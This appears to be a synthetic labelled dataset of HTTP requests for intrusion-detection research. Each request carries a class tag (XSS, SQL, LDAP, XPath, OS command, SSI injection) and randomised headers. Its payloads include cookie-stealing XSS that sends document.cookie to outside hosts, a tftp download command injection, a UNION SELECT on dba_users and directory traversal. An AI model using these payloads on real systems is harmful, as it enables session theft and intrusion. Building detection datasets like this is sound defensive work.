GET /5O7jtelnetyWBrKXf/52zx_Y6.RYqT@-RHNkq2.gif?yettzoosn3E81=adminmlacceptupdate%3Bagf8Bglocation%3Cpen&etedsoAp2ed7=ltdab&PTd%u=6892048729&kuS4phqeeh=ee3D+o0divec%3Cmi-1ec%3E&HCBVK9-J=Sa0teoerse&n4Rr=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&FR6Y=++dmsn%28p%40i&iAsld=+&wherepAxHf=nagoo&a8aRNnsaiqen2ta=eieai0tersbe2&lknaxrcreeed=816&lnsufywsb9=neexechttpss&ntnhkyhc=nix.-hyi HTTP/1.1
Host: 168.83.60.79
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: he-gisChtu;q=0.0
Cache-Control: only-if-cached
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Sat, 14 Nov 09 22:40:58 UTC
ETag: W/"@4NOJSZ4ADlYgjcuK"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Wed, 25 Jul 07 24:32:20 UTC
If-Unmodified-Since: Fri, 05 Oct 07 18:05:44 GMT
If-Match: "ZBGnUn_p0b7b0RA8"
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: Sat, 26 Jun 04 13:18:48 UTC
Max-Forwards: 45
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Basic c29nYWhoOlVwUjBtaHNh
Range: 009-9597,-73,-30
Referer: http://www.mfAitb.be/5Pda0tf/mtcueKMo/mePhnxc.tar
TE: chunked;q=0.7,gzip,deflate
Trailer: Referer
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 6.3; sp-fS; rv:5.6.8) Gecko/23076523
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 0.5 www.giaaAl.tiff, 2.8 www.faoe.css, 5.0 114.64.76.24
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 848 www.tgeSbw.css:3 "puaelnh9l" 
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39358
Start - Id: 38339
class: LdapInjection
GET /r3IQ5._sewGtybra19/Srr2aesohshaantq/pRw3jGEs/NecUarue1fTpgnbgdog/aasV7i/aoharorumisetee/PjlTEs/sp0.Nk1xujQdxvQ.php4?Mw=%29+%28%7C++%28ona%3Dbrhue*%29 HTTP/1.0
Host: 105.216.64.72
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: euc-jp;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 116.63.205.12
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="689"
Date: Sat, 29 Mar 08 13:35:56 CET
ETag: "WbPrN@xJVi3tQ@DS"
Expect: krvt=nsetrd;ejpTaih
From: ha6o@adqussrlf.gov
If-Modified-Since: Sun, 03 Feb 08 07:59:17 GMT
If-Unmodified-Since: Wed, 11 Mar 09 16:47:28 UTC
If-Match: *
If-None-Match: "EW-SDSWc9ivJO@zKJ@"
If-Range: "1M-N9ggkpIJmaNqZ"
Max-Forwards: 226
MIME-Version: 5.1
Pragma: nqefaof=lhiea
Proxy-Authorization: thnpao e7eGhet=ha4hIt
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: -159254,-412692
Referer: /uetx/unnunn/rpe6.pdf
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 7.6; ek-c4; rv:3.1.4) Gecko/90510234
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6454x625
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: identity
Upgrade: t6h/8.7, dvd/6.5, em9l/7.2
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38339
Start - Id: 47047
class: XSS
GET /yoPAJeJM/en@GxIz_U99UlEmy6w7/5fd17oDq1m/u-mCIN229Lks/itmenrtsyo4wo/Elpni2haAdisinEeaI/nellIstoittk/tdesCfUew/eDQ.asp?DlEwhereqopen1G5@qS=9&o7ienn=5Ps&-TmXgsweDnhJ=32130245&iZh=s5-objecto9s7kut&5Ct6.uk=%3Ciframe+++src+++%3D%22++vbscript%3A%5Balert+++%28%27re%27%29%3B%5D+++++%22%3E HTTP/1.1
Host: 238.181.57.12:0998
Connection: close
Accept: image/gif;q=0.5, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: o='hhtw'
Client-ip: 67.25.41.239
Cookie: eea2uono=3458358;dLVent=isil tjdbrh0esnieg ];TichT=5;ui7=eqe;xAesafGuhpahc=nss?s0object;8e=o7
Cookie2: $Version="33"
Date: Tue, 17 Feb 04 04:09:45 GMT
ETag: "xAjLDL6y7lpFf1FZDT"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Tue, 29 Aug 06 20:32:36 GMT
If-Match: "pDOI@uzYYd1uzYU3"
If-None-Match: *
If-Range: Sun, 13 Jun 04 21:51:41 GMT
Max-Forwards: 4
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: http://www.zhdpGnt.de/cfaicens.cgi
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 5.5; 0e-9n; rv:4.3.8) Gecko/58866129
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: compress
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47047
Start - Id: 47528
class: XSS
GET /eo@qg7Emug3/o6g/KW/espnl4tsttietdbflray/rHVLTFSNJAc3ZzB/ci7uf/aE9PtJVZsl.-lfZw4/inA3.swf?a5iaeqbryrp=%3DyoooC4ior1uoht6h&55i=swoormiOa4een&tirfTrlret=e5u4asneoahttpi&rtmpfrom5O-NOmetalinkZlib=cecKa9tiodhrNbded&aen2ewhoqnte=eYssau3&lpnccu=ae&CNvscriptqmDsjG=%26%3Cscript++++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Falte.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&otTrc=olhePs HTTP/1.1
Host: 80.14.125.57
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: hw-4emiTeyz;q=0.4, 1t-Oyf5Eei;q=0.9, Arfk-kqiornhs
Cache-Control: 3='f'
Client-ip: 2.40.61.206
Cookie: GV2iVo=32399957;aAidr0y=1871713;passwdG7DRMQMsamxp_cb=47;mfabrnt3s= tswinntr'l;.ERUcfX=16948
Cookie2: $Version="681"
Date: Sat, 30 Aug 08 06:20:43 CET
ETag: W/"-gXHqWTuyFHb9trO"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Thu, 18 Dec 08 18:01:56 UTC
If-Unmodified-Since: Thu, 19 May 05 11:25:33 GMT
If-Match: "iRCYsYMcqOqgKk6wpaD"
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 475
MIME-Version: 0.2
Pragma: itb=s
Proxy-Authorization: Basic ZW5JcnRnaW06aXRnYWM=
Authorization: Basic cDRzcG9zT3M6YTB1amV6MDA=
Range: 924-,916951-
Referer: http://bence.it/urc9/tepoii1.mpg
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: ol5Kdc83 http://www.rtra.be
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: eoihaa/6.5 101.236.164.179:489, niToxi/7.1 216.242.227.168, HTTP/2.2 www.otleetc9.htm:1293
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 191 69.38.217.187 "aooiItwaeofvrttacyi" "Thu, 28 Sep 06 12:38:57 UTC"
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47528
Start - Id: 41278
class: SqlInjection
GET /e._.LqjLcxM/Ih/l6cOq_D1y.xJVUE9F7/tilaZGo4gGzOtu2cLr/U.pSMGwL7MAnullB.sh?httpa7y9=iinclude&wiebln=85958570&3Go_vNinIE=33telt3anxeotttai5&JrsqudlIoe=7228879&bgsoundlN8childCrh.passthruQ-=cedt&rssl3nietoDwr=Ienrruwn&otlOebr=+ HTTP/1.1
Host: 155.71.203.41
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: spwar9h7-ts7, o-gasatu;q=0.6, fho2hM6-o, h-oEBw285S, inrs-fhfr
Cache-Control: max-stale=057
Client-ip: 22.64.104.193
Cookie: ns9ttd=ei;g1childUaf39=chairs'    UN/**/ION   SEL/**/ECT     ot4e6sr     FROM    dba_users     WHERE dof     like    '%25;ii.QmochazQlrq=eT@t02spei;C6I_DmAaAubd=28477991;hehalTeepEeAs=5Hqt;eeCc1enehO=ae%uinputbody:tr-fHao
Cookie2: $Version="7"
Date: Tue, 04 Oct 05 09:35:20 UTC
ETag: "RwUFwv_47PNnyMM"
Expect: eteab=inwd
From: elRhz@z5H6d.it
If-Modified-Since: Sun, 01 Jul 07 11:48:04 CET
If-Unmodified-Since: Fri, 16 Jul 04 02:53:54 CET
If-Match: "fzYSkdARu4d8M6qmN"
If-None-Match: "M1tvKvqCqEa-aJq"
If-Range: "44fZmDS5VELLVR5uMCI"
Max-Forwards: 693
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM aGFvd0NoYnVuaHN0bmVuT0VpbmUwdFFvaGYxZW9zZmE=
Range: 9564-
Referer: http://www.shem8f7.com/aTtlna/SlnnhI/elPn5.tiff
TE: deflate;q=0.2
Trailer: From
User-Agent: Mozilla/8.0 (compatible; MSIE 1.0; Win 9x; eitwbt; eeiova8rar; 0ead)
UA-CPU: StrongARM
UA-Disp: 6178,926,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: 5.7 69.247.55.101, FTP/7.0 www.sieafC.shtml
Transfer-Encoding: identity
Upgrade: yEe/8.1, maee/7.8, t0msf/7.4
Warning: 494 71.104.42.110 "s3fsa4pwOuhshdioo" 
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 891769847073825
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41278
Start - Id: 43587
class: OsCommanding
GET /psmFEqnetcatVE/c5M/nHscd00o/sy9l10BGqcqoh/aNhiern/ii@AYeR.KgpLO/RfirgeeewjAaSea/eJJR/3Tb@jUQ/s7anejt2oIRheteOleAu/iW/trzKWqQqKsEbeRdN.php4?d7nr=hperleweob&hpo5idgBturtui=%22+%3B+telnet++++242.33.150.213++++80++++%3B&.Ewp-@-1telnetC0=i8d&aLSAaoOigekhcsm=e HTTP/1.0
Host: www.mhuueuganf.ch
Connection: keep-alive
Accept: video/mpeg;q=0.0, audio/*;q=0.2, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hnsgnul-i;q=0.8
Cache-Control: only-if-cached
Client-ip: 209.18.180.198
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="9"
Date: Sat, 09 May 09 18:40:27 CET
ETag: "z@VDwv-LBAonIc6"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 16 Jul 05 13:47:46 UTC
If-Unmodified-Since: Mon, 26 Nov 07 23:49:47 UTC
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 680
MIME-Version: 2.6
Pragma: i30cor=aaP5NEe
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 0756-,6170-,99043-471
Referer: http://www.nlsnassh.fr/meldai/cirnokot.asmx
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: UEo4cEhTrowrnhreuzh4
UA-CPU: PowerPC
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 881x134
Via: 4.2 www.o4z4.jpeg:6354
Transfer-Encoding: compress
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43587
Start - Id: 49208
class: XPathInjection
GET /aCNnf.exe?sr1=%28i++++%3C+count%28dx%2Fchild%3A%3Atext%28%29%29+++and+++++j++++%3C++++count%28ca%2Fchild%3A%3Acomment%28%29%29++and+++k+%3C++count%28bts%2Fchild%3A%3A*%29++++%29 HTTP/1.0
Host: www.Penr.be
Connection: nmifB
Accept: video/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 2giirxa-nagn8re, exof-T;q=0.2, Uah-vti
Cache-Control: max-age=268
Client-ip: 0.187.188.191
Cookie: ncbyJ=5;jI@@Z0LLR5processing-instruction=uHmZ-lY2rN;iXbtcEapXcfnfd=4421850;_2zWKjBtelnetQ5=noicpdvaofhemcplg;qoopoHa=siameif3LswcRh;t9mksmxhki=oidg
Cookie2: $Version="2"
Date: Mon, 11 Aug 08 07:56:58 UTC
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Tue, 20 Jun 06 07:08:49 GMT
If-Unmodified-Since: Sun, 04 Oct 09 16:17:47 GMT
If-Match: "ncFI5WbOf.yRmo2jr"
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 5373
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: /sji0/h0jFsehd/lnbskeI.cfm
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 0.0; Ze-io; rv:1.2.2) Gecko/05509185
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: aofh
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49208
Start - Id: 37934
class: LdapInjection
GET /3q8fbLh./o55CTmpzE/5ZxhckFRP.jpeg?p5.cmdMemupdate=nb3d&ifewaoNee1cne=tWLe&p.IWY8nl7nVl=%7Cvin&wwghf=bGfv9biy&eniajc1ANerwshO=v069ls6ebaimprsou&atnpt0ydeiow=%29+%28++%7C+%28+cn%3D*o+++%27brien*+%29%28mail%3D*o+%27brien*%29+&ehn5ehd=81691647&s6sblalaezyl=rshutdown&oO3BexecS=44008662&dmasuuwo2iReec=2aAx_PHT&aeiEibe8ihftjtT=plocation&nnuyisatldfeon=xeLc7crleoa&9hwenyd1eeTeon=30626&egiyotd7u=2364760 HTTP/1.1
Host: www.etntp.net
Connection: fittsot
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=63
Client-ip: 140.12.39.241
Cookie: zoNhrimkTs4=MrIerecitlvtwpmgA;qr7pmiPpbT=cg;fgaIfsh4=a2DolE_sLUY6;vu3n=re;trla=8704
Cookie2: $Version="6"
Date: Wed, 29 Dec 04 23:16:37 UTC
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: Rna7leoD
From: heal@ehrTn.gov
If-Modified-Since: Thu, 22 Jun 06 19:05:47 UTC
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: "9_-htGGY-ZI9ZD_nMOaJ"
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 505
MIME-Version: 8.6
Pragma: 7mHNHa=ee3eiba
Proxy-Authorization: skno0 leiotlhl=mslla
Authorization: Digest algorithm=MD5
Range: 92-
Referer: http://Ccn8hw.de/tn9zf/4oonG/hutotI/ceiph.exe
TE: chunked,trailers
Trailer: Upgrade
User-Agent: sp6gaho (mS0qNJ@6mt; euWFrnZNO4)
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.1 www.lspeuP.html, HTTP/3.6 www.napI2nwr.js, HTTP/8.3 www.n6i5ns.jpg
Transfer-Encoding: compress
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37934
Start - Id: 40778
class: SSI
POST /s7lhr3smieccgrntpaut/Tl/3lliosneiihnoeifjcc/a-4y/uvde3d2dEdc/subNeObns/IsamDS/RmesoerEewI/yWEs/exA@/mailstdinaG7qMx-null4st4rm/eeiaar4t.shtml? HTTP/1.0
Content-Length: 384
Content-Language: net
Content-Encoding: compress
Content-Location: http://tihSi.st/Xcsa/eec8/esdaaae/Otoc.bin
Content-MD5: dm5uaWVtb2Rlc3RzdXRSNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Nov 04 24:52:42 UTC
Last-Modified: Sun, 17 Apr 05 14:30:09 CET
Host: www.tcri.de:739
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: am5Yzeo-cdaoo;q=0.0, sieiB-stadat, rztpaD-9saOebc;q=0.5, i-ogxzeyu, S2anaPn-62eyeat
Cache-Control: only-if-cached
Cookie: 4eiitt4=801;Elkforma=66586033;aey8ir1aeubl8i=009627816;mu=58782;e0tdn=wp-oza|teyos Ep 0l
Cookie2: $Version="096"
Date: Sat, 15 Oct 05 07:44:10 UTC
ETag: "rEoemZBn5XOg5oITDDbP"
Expect: 100-continue
From: cLaa@tnaEOe.cz
If-Modified-Since: Tue, 27 Sep 05 08:59:44 CET
If-Match: "0t._Yd52pV2m98Eq"
If-None-Match: *
If-Range: *
Max-Forwards: 0848
Pragma: eswy=N
Proxy-Authorization: Digest opaque="lnld"
Authorization: otCoo Exln=ec2s4w
Range: 35-,-4
Referer: http://dpe9e.uk/vvilt/oqeeL8te/treOdfs.pdf
Trailer: If-Unmodified-Since
User-Agent: fgeaeC (ceW3o.qq; uksmjQtAL7; emRygpl)
Via: FTP/1.0 137.255.192.252, 5.1 www.gy1nn9tb.shtml
Transfer-Encoding: deflate
Warning: 370 www.fpazeosi.tiff "AewOdth" 
X-Serial-Number: 29371695931968752
----: -----------------------------------------

pCniierriOter=535152&taeocadai=ed26p&sddu=passthruehi33lhaving/ ;h&efifedeanttm=7127713&9drop3s09gq=ede&bqnBNha=03288168&G5yG-Rxe=nsEriE &stsdteebEna=fteeeremdWU&nqn4fishogthg=9066772&ggShma7d=iuezanull(oE<1boot.inio4aisae&es23E=089611&zaPZN=<!--#odbc  connect="rseE,eltg,rkCte"        statement="select    *    from ri"-->&uNd_RCA3UB=iRex@caeCEayrsd

End - Id: 40778
Start - Id: 43137
class: OsCommanding
GET /adseoeos/cflhFt1khU/sn/al3Op/rCDv5H3RFMaZWjoknuT/3O4a7Qen9eelaeal0n/tH0pFEjdw7@CBpbLG@.png?yeNsetO=rdY&aesPre5i7=%27+++%3B+++++tftp++-c+++++get++++www.rote.com%3A%2Fnitielie.tar&ktIo0sqthOhds=es2mUDiCL7S&lbNn7alm=594471&e2aRivn=Hcdcahd9x&ryNrxol5=h4ipcopytodopt&int1386a7edie=33937&YYen5DTRM0sv=3iaa++d%5Cc&em6rsefla58=15403128&oipsqvgumoistyt=4hrshtacces%3DulQlme6a&9tAUetnal=gwnT&tnwmu=qeoaziiut5vsoteJpc&rfawyolc=nTen2oxl7&0d-gROWn6jMshutdown=%3A%27%3Dtmph HTTP/1.0
Host: www.at7Ioqou.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-6, cp-950, windows-1251;q=0.7
Accept-Encoding: deflate, identity
Accept-Language: 7-yort;q=0.8, Oosgset-ib;q=0.0, qpsufs-elsbh;q=0.1
Cache-Control: max-stale=73293
Client-ip: 55.189.197.20
Cookie: Etm96=np4nnetornepm;TbkFe2YqA=A;2VZ46hVQP=snihd &loa;ltt=tet|nodenselect+eacmhmO7ohW
Cookie2: $Version="7"
Date: Thu, 20 Apr 06 16:24:07 CET
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ndud@rzo8frE.cz
If-Modified-Since: Sat, 18 Jun 05 08:17:32 CET
If-Unmodified-Since: Sat, 28 Nov 09 17:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Oct 08 16:51:39 UTC
Max-Forwards: 549
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: rates2 ipii1rie=esrrf
Range: 06-14835,74438-28398,3461-5
Referer: http://www.giai.ch/8beeus/h1doa.doc
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: tiaoi/0.0.4.2
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.8 www.mvd5jheh.js:04767, HTTP/4.2 161.95.194.78
Transfer-Encoding: identity
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 413241650
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43137
Start - Id: 48372
class: XPathInjection
GET /ybryXFOtWSp1lI.php? HTTP/1.0
Host: 52.169.22.16
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: pdiot'    or    dLmqs/Mo/child::node()[processing-instruction()=716]    or  'Tnrt'=   '
Cache-Control: min-fresh=1
Client-ip: 98.194.141.82
Cookie: nrn3eudhEDhcmkO=rOd;pySnfoa6sq=63609587
Date: Sat, 30 Jul 05 11:16:42 UTC
ETag: W/"Mmf2yatPD0NUtyuY5-g"
Expect: HetkQ=ev2xa
From: s5al6B3@ostl.it
If-Modified-Since: Mon, 21 Aug 06 22:39:47 GMT
If-Unmodified-Since: Fri, 14 Mar 08 20:09:49 UTC
If-Match: *
If-None-Match: "oPk1-eHmIbZ2xddccW"
If-Range: *
Max-Forwards: 2344
MIME-Version: 1.1
Pragma: tmsnhT9o='ensetty'
Proxy-Authorization: Basic bnRyaXNoOmluZW9k
Authorization: pi4it etrtNw=iazn
Range: -101,-0,2257-
Referer: /tIiry2i/hstn/bndO/s5tpo.htm
TE: chunked;q=0.5,chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 7.2; wt-ht; rv:9.1.6) Gecko/19061834
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 516x4086
Via: 0.5 www.v6ohiejf.css, 8.0 www.qutd.htm, FTP/9.7 249.191.55.235
Transfer-Encoding: gzip
Upgrade: bet/7.8, 8soh/6.0, iHde0s/2.8, dtO/9.5
Warning: 920 242.150.132.18 "hesjsoctncttlo" "Wed, 13 Jan 10 09:05:54 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48372
Start - Id: 44483
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 235.49.72.29
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.9, gzip, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 29.10.71.191
Cookie: epevdnh6Litaerv=dvTdcWBzD;Scruoooo=stoSoaehae1;deTce252ako=oteincludeluRtd0dee>tChmo6
Cookie2: $Version="960"
Date: Wed, 12 Jan 05 22:22:55 UTC
ETag: W/"tWaGECFfpG_GilO7"
Expect: nets=rpaui;afeisve8=e88t
From: xeaiisnn@jemn.de
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Tue, 07 Oct 08 21:39:33 GMT
If-Match: "J5ri1b0XTElPXyi5"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: Thu, 05 Jan 06 06:45:25 UTC
Max-Forwards: 9
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: 83215-
Referer: http://YNIugew.cz/ru5ttsoe.php3
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 4.9; on-Tu; rv:7.0.7) Gecko/68215535
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: 9tce/2.4, 81y/1.2, m88lo/5.7
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44483
Start - Id: 47451
class: XSS
GET /eN_qoV6YLJ/8hr80enud.aspx?91rdprjLet3aI=s1c&itte=%26%7B%5Bwindow.open%28%27http%3A%2F%2F70.10.76.185%2Fch.php%27%2Bdocument.cookie%29%3B%5D%7D%3B&hthiosr4ew7fsh=ennehrOyn02Sscot&Ebh1=0385047&mpeiiatLA=rvu_UMIu_j HTTP/1.0
Host: 59.254.54.163:80
Connection: Retme
Accept: application/zip;q=0.3, video/*
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 240.24.234.3
Cookie: oazrRheep=naa
Cookie2: $Version="073"
Date: Sun, 04 Feb 07 04:31:33 UTC
ETag: "U5M.V.6GiVUtXHXYQ5NI"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 22 Sep 04 21:25:32 CET
If-Unmodified-Since: Thu, 01 Apr 04 04:43:39 UTC
If-Match: "y4aOGzYbVyyNL_VM"
If-None-Match: *
If-Range: "60VbaHM_D1OFTdgY-"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="eiunos"
Range: 9547-817639
Referer: /toscaF.asp
TE: chunked
Trailer: From
User-Agent: snrraoumteylloooase
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: mus4pe
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47451
Start - Id: 37909
class: LdapInjection
